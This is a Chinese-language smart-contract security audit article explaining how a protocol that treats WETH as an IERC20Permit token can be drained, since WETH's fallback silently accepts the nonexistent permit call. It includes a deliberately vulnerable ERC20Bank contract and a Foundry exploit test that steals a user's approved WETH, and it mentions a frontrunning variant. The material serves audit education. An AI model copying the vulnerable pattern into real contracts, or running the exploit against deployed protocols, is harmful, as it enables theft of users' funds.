安全审计中WETH的permit问题

目前大部分新发的ERC20 Token都带有permit功能,即通过签名完成授权。签名的人不需要上链，省了gas，但是实际上更危险，一不小心签名，可能把所有的Token授权给他人了。下面是permit的细节

/**

* @inheritdoc IERC20Permit

*/

function permit(

address owner,

address spender,

uint256 value,

uint256 deadline,

uint8 v,

bytes32 r,

bytes32 s

) public virtual {

if (block.timestamp > deadline) {

revert ERC2612ExpiredSignature(deadline);

}

bytes32 structHash = keccak256(abi.encode(PERMIT_TYPEHASH, owner, spender, value, _useNonce(owner), deadline));

bytes32 hash = _hashTypedDataV4(structHash);

address signer = ECDSA.recover(hash, v, r, s);

if (signer != owner) {

revert ERC2612InvalidSigner(signer, owner);

}  
_approve(owner, spender, value);

}

不过本文不是主要分析个人怎么防止随意签名，而是协议在实现过程中不注意，将WETH当成了IERC20Permit使用，则有可能造成大的损失。

WETH上如果调用permit

我们知道WETH没有permit函数。但是它的fallback啥都没检查，实际上在WETHsh上调用任意函数都会通过不会报错。因为它将是调用了一遍msg.value=0的deposit而已。

fallback() external payable {

deposit();

}

function deposit() public payable {

balanceOf[msg.sender] += msg.value;

emit Deposit(msg.sender, msg.value);

}

错误的协议实现

即把WETH当成了IERC20Permit使用

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import {IERC20Permit} from "./IERC20Permit.sol";

contract ERC20Bank {

IERC20Permit public immutable token;

mapping(address => uint256) public balanceOf;

constructor(address _token) {

token = IERC20Permit(_token);

}

function deposit(uint256 _amount) external {

token.transferFrom(msg.sender, address(this), _amount);

balanceOf[msg.sender] += _amount;

}

function depositWithPermit(

address owner,

address recipient,

uint256 amount,

uint256 deadline,

uint8 v,

bytes32 r,

bytes32 s

) external {
//do not check signaturer == owner
token.permit(owner, address(this), amount, deadline, v, r, s);

token.transferFrom(owner, address(this), amount);

balanceOf[recipient] += amount;

}

function withdraw(uint256 _amount) external {

balanceOf[msg.sender] -= _amount;

token.transfer(msg.sender, _amount);

}

}

测试代码：

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import {Test, console2} from "forge-std/Test.sol";

import {ERC20Bank} from "../../src/WETH-Permit/ERC20Bank.sol";

import {WETH9} from "../mocks/WETH9.sol";

contract ERC20BankExploitWETHPermitTest is Test {

WETH9 private weth;

ERC20Bank private bank;

address private constant user = address(11);

address private constant attacker = address(12);

function setUp() public {

weth = new WETH9();

bank = new ERC20Bank(address(weth));

deal(user, 100 * 1e18);

vm.startPrank(user);

weth.deposit{value: 100 * 1e18}();

weth.approve(address(bank), type(uint256).max);

bank.deposit(1e18);

vm.stopPrank();

}

function testWETHPermit() public {

uint256 bal = weth.balanceOf(user);

vm.startPrank(attacker);

bank.depositWithPermit(user, attacker, bal, 0, 0, "", "");

bank.withdraw(bal);

vm.stopPrank();

assertEq(weth.balanceOf(user), 0, "WETH balance of user");

assertEq(

weth.balanceOf(address(attacker)),

99 * 1e18,

"WETH balance of attacker"

);

}

}

损失发生的前提是User也要对合约ERC20Bank进行授权。当然如果没有最大授权，依然可以进行攻击，可以通过检测有用户授权合约ERC20Bank，frontrun用户的deposit()的调用，完成攻击。 参考： https://medium.com/zengo/without-permit-multichains-exploit-explained-8417e8c1639b